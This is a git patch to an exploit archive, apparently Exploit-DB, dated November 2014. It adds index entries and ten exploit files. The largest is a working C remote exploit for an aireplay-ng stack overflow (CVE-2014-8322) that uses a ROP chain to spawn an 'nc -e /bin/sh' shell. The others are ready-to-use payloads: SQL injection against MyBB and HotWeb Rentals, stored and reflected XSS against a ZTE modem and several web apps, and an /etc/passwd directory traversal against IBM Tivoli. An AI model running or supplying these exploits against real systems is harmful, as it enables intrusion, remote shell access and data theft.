From 79ad0e1a38a5d6fb1efd94385f2175464166c621 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 4 Nov 2014 04:45:24 +0000 Subject: [PATCH] Updated 11_04_2014 --- files.csv | 10 ++ platforms/hardware/webapps/35128.txt | 23 +++++ platforms/linux/remote/35018.c | 148 +++++++++++++++++++++++++++ platforms/linux/remote/35148.txt | 9 ++ platforms/multiple/remote/35144.txt | 9 ++ platforms/php/webapps/35140.txt | 11 ++ platforms/php/webapps/35141.txt | 11 ++ platforms/php/webapps/35142.txt | 7 ++ platforms/php/webapps/35143.txt | 7 ++ platforms/php/webapps/35145.txt | 9 ++ platforms/php/webapps/35149.txt | 9 ++ 11 files changed, 253 insertions(+) create mode 100755 platforms/hardware/webapps/35128.txt create mode 100755 platforms/linux/remote/35018.c create mode 100755 platforms/linux/remote/35148.txt create mode 100755 platforms/multiple/remote/35144.txt create mode 100755 platforms/php/webapps/35140.txt create mode 100755 platforms/php/webapps/35141.txt create mode 100755 platforms/php/webapps/35142.txt create mode 100755 platforms/php/webapps/35143.txt create mode 100755 platforms/php/webapps/35145.txt create mode 100755 platforms/php/webapps/35149.txt diff --git a/files.csv b/files.csv index 117ccf165..f46a26c55 100755 --- a/files.csv +++ b/files.csv @@ -31540,6 +31540,7 @@ id,file,description,date,author,platform,type,port 35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 'email.cgi' Cross Site Scripting Vulnerability",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0 35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 member.php Multiple Parameter SQL Injection Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 index.php Multiple Parameter XSS",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 +35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - ""tcp_test"" Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0 35019,platforms/windows/local/35019.py,"Windows OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0 35020,platforms/win32/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,metasploit,win32,local,0 35021,platforms/linux/local/35021.rb,"Linux PolicyKit Race Condition Privilege Escalation",2014-10-20,metasploit,linux,local,0 @@ -31642,6 +31643,7 @@ id,file,description,date,author,platform,type,port 35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0 35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0 35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 +35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Stored XSS Vulnerability",2014-10-31,"Ravi Rajput",hardware,webapps,0 35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0 35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability",2010-12-21,"Jan Fry",linux,remote,0 @@ -31650,3 +31652,11 @@ id,file,description,date,author,platform,type,port 35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0 35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0 35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 +35140,platforms/php/webapps/35140.txt,"MyBB 1.6 search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 +35141,platforms/php/webapps/35141.txt,"MyBB 1.6 private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 +35142,platforms/php/webapps/35142.txt,"Social Share 'search' Parameter Cross Site Scripting Vulnerability",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 +35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0 +35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 Cross Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0 +35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0 +35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0 +35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0 diff --git a/platforms/hardware/webapps/35128.txt b/platforms/hardware/webapps/35128.txt new file mode 100755 index 000000000..1f1f63293 --- /dev/null +++ b/platforms/hardware/webapps/35128.txt @@ -0,0 +1,23 @@ +# Exploit Title: ZTE Modem Stored XSS Vulnerability +# Date: 30-10-2014 +# Exploit Author: Ravi Rajput aka Gr3y n00b IHT team +# Version: ZXDSL 531BIIV7.3.0f_D09_IN +# Software Link:http://wwwen.zte.com.cn +#Tested on : Windows 7 +# code : + +GET /ntwksum2.cgi?ntwkPrtcl=3&enblService=1&serviceName=%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.1.1/enblbridge.html +Cookie: ls_google_allow=1; ls_iserver_timestamp_bnc_bsaved=1414677822551; ctx1420m06d05=7b2273756363657373223a302c226c6f675f616374697665223a307d +Authorization: Basic YWRtaW46YWRtaW4= +Connection: keep-alive + +Attack details : +The variable aerviceName has been set to simple payload + + diff --git a/platforms/linux/remote/35018.c b/platforms/linux/remote/35018.c new file mode 100755 index 000000000..788b11455 --- /dev/null +++ b/platforms/linux/remote/35018.c @@ -0,0 +1,148 @@ +/* + * Exploit Title: Aireplay "tcp_test" Length Parameter Inconsistency + * Date: 10/3/2014 + * Exploit Author: Nick Sampanis + * Vendor Homepage: http://www.aircrack-ng.org/ + * Version: Aireplay-ng 1.2 beta3 + * Tested on: Kali Linux 1.0.9 x64 + * CVE : CVE-2014-8322 + * Description: Affected option "aireplay-ng --test" + */ + +#include +#include +#include +#include +#include +#include +#include +#include /* See NOTES */ +#include +#include +#include + + +#define __packed __attribute__ ((__packed__)) +struct net_hdr { + uint8_t nh_type; + uint32_t nh_len; + uint8_t nh_data[0]; +}__packed; + +#define POP_RDI "\xb8\x29\x40\x00\x00\x00\x00\x00" +#define POP_RBX "\x88\x92\x41\x00\x00\x00\x00\x00" +#define RPOP_RBX "\x00\x00\x00\x00\x00\x88\x92\x41" +#define MOV_TO_RDI "\xf3\x47\x41\x00\x00\x00\x00\x00" +#define COMMAND "nc -l -p 1234 -e /bin/sh\x00" +#define SYSTEM "\x50\x23\x40\x00\x00\x00\x00\x00" +#define PAD_BYTES 1304 + +unsigned char *exploit_init(char *command, size_t size); + +int main(int argc, char *argv[]) +{ + struct net_hdr rh; + struct sockaddr_in server, client; + unsigned char *exploit; + socklen_t len; + size_t size; + char *command, exec[1024]; + int sockfd, cl, val = 1; + + printf("[+]Exploit for aireplay-ng tcp_test remote stack overflow\n"); + printf("[+]Written by Nick Sampanis CVE-2014-8322\n"); + if (argc == 1) { + fprintf(stderr,"[-]Usage: %s port command\n" + "[-][Default %s]\n", argv[0], COMMAND); + return -1; + } + if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { + perror("[-]Socket()"); + return -1; + } + memset((char *)&server, '\0', sizeof(server)); + len = sizeof(server); + server.sin_addr.s_addr = 0; + server.sin_port = htons(atoi(argv[1])); + server.sin_family = AF_INET; + if (argv[2]) + command = argv[2]; + else + command = COMMAND; + + setsockopt(sockfd, SOL_SOCKET,SO_REUSEADDR, &val, sizeof(val)); + if (bind(sockfd, (struct sockaddr *)&server, sizeof(server)) == -1) { + perror("bind()"); + return -1; + } + if (listen(sockfd, 5) == -1) { + perror("listen()"); + return -1; + } + printf("[+]Server is waiting for connections on port %d\n", atoi(argv[1])); + + if (!(size = (strlen(command)+8)*5/4*8+PAD_BYTES+sizeof(rh))) + return -1; + exploit = exploit_init(command, size); + while (1) { + if ((cl = accept(sockfd, (struct sockaddr *)&client, &len)) == -1) { + perror("[-]Accept"); + return -1; + } + printf("[+]Client %s has been connected\n", inet_ntoa(client.sin_addr)); + if (send(cl, exploit, size, 0) == -1) { + perror("[-]Send"); + return -1; + } + if (recv(cl, &rh, sizeof(rh), 0) == -1) { + perror("[-]Recv"); + return -1; + } + close(cl); + sleep(1); + if (!argv[2]) { + printf("[+]Enjoy your shell\n\n"); + snprintf(exec, sizeof(exec), "nc %s %d", + inet_ntoa(client.sin_addr), atoi(argv[1])); + system(exec); + } + + } + close(sockfd); + free(exploit); + + return 0; +} + +unsigned char *exploit_init(char *command, size_t size) +{ + unsigned long DATA = 0x6265a0; + unsigned char *buffer, *exploit; + struct net_hdr nh; + register int i, j; + + buffer = malloc(size); + nh.nh_type = 0x1; + nh.nh_len = htonl(size-sizeof(nh)); + memcpy(buffer, &nh, sizeof(nh)); + memset(buffer+sizeof(nh), 'A', PAD_BYTES); + exploit = buffer+sizeof(nh)+PAD_BYTES; + + for (i = j = 0; j < strlen(command)+4; i+=5) { + memcpy(exploit+i*8, POP_RDI, 8); + memcpy(exploit+(i+1)*8, &DATA, 8); + memcpy(exploit+(i+2)*8, POP_RBX, 8); + memcpy(exploit+(i+3)*8, command+j, 8); + memcpy(exploit+(i+4)*8, MOV_TO_RDI, 8); + DATA += 4; + j += 4; + } + DATA = 0x6265a0; /*.data*/ + memcpy(exploit+i*8, POP_RDI, 8); + memcpy(exploit+(i+1)*8, &DATA, 8); + memcpy(exploit+(i+2)*8, SYSTEM, 8); + + return buffer; +} + + diff --git a/platforms/linux/remote/35148.txt b/platforms/linux/remote/35148.txt new file mode 100755 index 000000000..d63c83559 --- /dev/null +++ b/platforms/linux/remote/35148.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45582/info + +IBM Tivoli Access Manager for e-business is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks. + +IBM Tivoli Access Manager for e-business 6.1.1 is vulnerable. + +http://www.example.com/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd \ No newline at end of file diff --git a/platforms/multiple/remote/35144.txt b/platforms/multiple/remote/35144.txt new file mode 100755 index 000000000..21820dd41 --- /dev/null +++ b/platforms/multiple/remote/35144.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45568/info + +Appweb is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Appweb 3.2.2-1 is vulnerable; other versions may also be affected. + +http://www.example.com/ejs/%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35140.txt b/platforms/php/webapps/35140.txt new file mode 100755 index 000000000..e43ed7df6 --- /dev/null +++ b/platforms/php/webapps/35140.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/45565/info + +MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +MyBB 1.6 is vulnerable; other versions may also be affected. + +POST /mybb/search.php + +action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1 \ No newline at end of file diff --git a/platforms/php/webapps/35141.txt b/platforms/php/webapps/35141.txt new file mode 100755 index 000000000..d197b5dad --- /dev/null +++ b/platforms/php/webapps/35141.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/45565/info + +MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +MyBB 1.6 is vulnerable; other versions may also be affected. + +POST /mybb/private.php + +my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff \ No newline at end of file diff --git a/platforms/php/webapps/35142.txt b/platforms/php/webapps/35142.txt new file mode 100755 index 000000000..4af33db7c --- /dev/null +++ b/platforms/php/webapps/35142.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45566/info + +Social Share is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/socialshare/search.php?search= \ No newline at end of file diff --git a/platforms/php/webapps/35143.txt b/platforms/php/webapps/35143.txt new file mode 100755 index 000000000..857260727 --- /dev/null +++ b/platforms/php/webapps/35143.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45567/info + +HotWeb Scripts HotWeb Rentals is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +http://www.example.com/default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users \ No newline at end of file diff --git a/platforms/php/webapps/35145.txt b/platforms/php/webapps/35145.txt new file mode 100755 index 000000000..6cc8ff0f1 --- /dev/null +++ b/platforms/php/webapps/35145.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45578/info + +Pligg CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +Pligg CMS 1.1.3 is vulnerable; other versions may also be affected. + +http://www.example.com/cloud.php?range={SQL} \ No newline at end of file diff --git a/platforms/php/webapps/35149.txt b/platforms/php/webapps/35149.txt new file mode 100755 index 000000000..7c264a153 --- /dev/null +++ b/platforms/php/webapps/35149.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45586/info + +LiveZilla is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +LiveZilla 3.2.0.2 is vulnerable; other versions may also be affected. + +http://www.example.com/livezilla/server.php?request=track&livezilla= \ No newline at end of file